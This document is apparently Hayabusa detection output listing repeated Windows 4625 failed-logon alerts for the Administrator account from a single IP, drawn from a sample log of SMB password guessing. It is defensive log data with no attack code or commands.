2016-09-20 01:50:52.260 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ezuHluj1fEC9KdQ1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bXH5uDfo4WB6QEnQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:52.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yWvZjuZhnGcrelOM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.434 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vb6ePjmpA8ZwK1PW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7e1A9ZY20WM8oDn6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.523 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 71GKLnXqSEEuc1Fw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.556 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: w0GsW0vDEkpRa1X0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0HH6zUUoL0qlfFC2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.636 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AG4pYsjob1iwlOc0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.677 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dNCX5tZ0nF1foTLW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.710 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vO82Kb0kboVFuJy6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.793 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DptE2C8ZK3AxCb43 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.871 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NC8manvVP5pU8F3N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.926 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: m00bI5welsLUWmwJ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:52.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4shyxJk2PiH1TDlj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xZyN2WO3UVY0WQs6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.053 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oSQjAMckifap5r1k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.096 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qixqXiX0mVcuXe37 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.126 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIfJCJz6l36WMeY9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.166 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SZxv5U7uoN6E8c8E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mlIfE0N32OQeWuNw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.256 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nkZcjpTmHcJ0uX38 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.301 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZfaHr2Yq6xkRjOI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.336 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jvy0EIiPSnom7pn3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TN9PUb0BgI3u8Xax | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xCgz5BNpQgLgW0Xi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.478 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: po2GBdrXr3XtBsWR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.524 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: O2rgo6jHcqu10IGY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.573 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MLblUOGzYzVA47E9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.616 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ysuA1xpYuAGRNONJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.660 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ksedziaGzXk5VNlS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.711 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: irIfGLQdhtRRGwuo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.752 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YCf6WUjiS11hHqKT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1o0CTT7GsWfCWuHx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: F6Jr8XrUsmTiSdol | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.868 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Buj66iuSkLEQdKnQ | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.912 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: L1wOLI51HqfkgO6r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4oe273WXOICzkwW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:53.992 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1c7nGezYNJ70jR6R | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.037 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ajuZ09zGeuovCQLg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.081 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: z4k7xV7soNF4mHlz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.116 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CtdqW8zOw1GoQcvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aY6FLi1edRZWrRZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.204 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ah1JoKfxJzQhCCVL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gIMOZRGcv4o33BWd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.276 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nmLyLJoVZz6fJ62I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.308 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aGufqEGD4hFf2XLM | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7IEdKy2H5Agblpjt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.384 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XT9k8C05GVLBNPdl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5opHh8HelCXtR5Cm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.473 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K0dntDwYLmag9efo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.514 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQfZOMFV9LtY7r2S | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.632 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y01v38dTUIsJEZIv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.684 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pCP8x2QBZ6IvMEnf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.739 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hgcbYjw3kKqlK7Di | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.774 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TFU97Tq3e7IWvSKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.808 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1hUCvaS1yM2FU9AE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.852 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8JInVlBqTSfT4J1s | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjXRQUGDKBZaMkw3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.937 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fZPXNxkGOrld5eCR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:54.978 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OBDhSrF7DZ1KBRa8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.013 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dQ7TKJOGibAVNoCH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.054 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZE1GARxx03m4FtEL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.096 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Gf3VLLTxsK85bsrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.123 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 58G6MFVbW55JZIV5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.160 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Yxne9LqZCqBf3qkc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.200 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ssZya6gArnuepKyW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.244 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rsDEj6o0NaKUYPZL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pELSIsupIYAxPCtv | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.330 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: urHCDmdCfNexxUHf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.373 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czGXZFukLquA9Mce | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.424 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: icWMY9pKCQMyTxJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.464 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v28FLC2WXEXSUiI5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FwhjHww5iA51SFjp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:55.552 
